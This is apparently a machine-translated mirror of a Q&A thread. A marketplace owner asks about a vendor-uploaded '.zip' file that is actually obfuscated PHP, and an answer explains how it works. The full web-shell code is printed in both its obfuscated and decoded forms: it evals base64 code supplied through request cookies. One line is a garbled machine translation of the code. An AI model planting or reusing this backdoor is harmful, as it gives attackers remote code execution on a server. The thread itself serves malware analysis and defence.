Php 以前有人见过像这样的代码混淆吗？这是什么意思？_Php_Obfuscation_Deobfuscation

Php 以前有人见过像这样的代码混淆吗？这是什么意思？

php

Php 以前有人见过像这样的代码混淆吗？这是什么意思？,php,obfuscation,deobfuscation,Php,Obfuscation,Deobfuscation,我拥有一个数字商品市场，一个供应商上传了这个文件，它是一个zip文件，但在windows中显示为损坏。当我在linux中打开它时，我震惊地发现文件本身是一个php文件，有人在其中添加了.zip扩展名以前有人见过这样的代码吗？有人能帮我弄明白吗？这是恶意的吗 <?php $pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9"; $seld="ZXB

我拥有一个数字商品市场，一个供应商上传了这个文件，它是一个zip文件，但在windows中显示为损坏。当我在linux中打开它时，我震惊地发现文件本身是一个php文件，有人在其中添加了.zip扩展名

以前有人见过这样的代码吗？有人能帮我弄明白吗？这是恶意的吗

<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","wswtwrw_wrwepwlwacwe");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "bibabisbie64bi_dbiebicbiobidbie");
$iign = $cyvj("x","","xcxrxexaxtxex_funxctixon");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>

到目前为止，这就是我从中得到的

<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","str_replace");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "base64_decode");
$iign = $cyvj("x","","create_function");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>

$xzfy = create_function(base64_decode(JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdtYScgJiYgJGMoJGEpPjMpeyRrPSdzZXJhdGknO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10nJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9))

$c='count';$a=$_COOKIE;if(reset($a)=='ma' && $c($a)>3){$k='serati';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}


$xzfy=创建_函数（基本64_解码（JGM9J2NVDW50JZSKYT0KX0NPT0TJRTTPZIHYZXNLDCGKYSK9PSDTYSCGJIYGJGMOJGEPPJMPJMPEYRRPSDZZZXJDGKNO2VJAG8GJZWNLIRLIC+JZTLDMFSKJJ2NF9KWNWNVZGZUCHUCHJZLKZZZZZBSYWYKFYCF5KCVW15CDZ10NJYWYWYWNL1ZYYL1ZZYYYL1ZYL1ZYYLKK7LKK7LKKKKJJJJJJJJJJJJJJJJJJJJJJJJKKKKKKKKKKKKKKKKKKK
$c='count'$a=$\u饼干；如果（重置（$a）='ma'&&$c（$a）>3）{$k='serati'；echo'；eval（base64_解码（preg_替换（数组（'/[^\w=\s]''''/\s/））、数组（'''+'）、连接（数组切片（$a，$c（$a）-3 `'））；echo'}

TL；DR此代码允许人们使用cookies在服务器上执行任意脚本

代码所做的是使用一组随机的base64字符串创建一个函数，然后立即执行它。我花了一些时间对函数进行了模糊处理，给出了以下内容：

if($_COOKIE[0] =='ma' && count($_COOKIE)>3){
    echo '<serati>';
    eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
    echo '</serati>';}

让我们把它分成几个部分：

join（数组切片（$\u COOKIE，计数（$\u COOKIE）-3））

此片段将$\u COOKIE数组中的所有项连接在一起，从count（$\u COOKIE）-3开始，直到数组结束（使其成为一个字符串）

preg\u替换（数组（'/[^\w=\s]'''/\s/'）、数组（'''+'）

首先，它在新创建的字符串中搜索模式“example=”（example可以是任何单词），并将其替换为Nothing

test='blah'

它将被替换为

blah'

这也将所有空格替换为+

eval（base64_解码（..）；

这将获取刚刚创建的字符串（大概是base64中的内容）并将其解码为人类可读的格式，然后获取该字符串并在服务器上执行

基本上，这意味着有人可以在Base64中的机器上创建一些cookie，您的服务器会将它们粉碎成一个长字符串，解码并执行它。

但是，如果我只允许作为zip文件上载，他们就不能正确地执行zip文件中的php代码了？这将取决于web服务器的设置方式。我刚刚尝试将一个包含php内容的.zip文件上载到本地nginx服务器，并查看发生了什么，它只是被下载而不是执行。但是，他们可能伪造了扩展名。检查的一种方法是将文件内容更改为

echo'test'

，将其放回去，然后查看在点击url时发生了什么。

eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));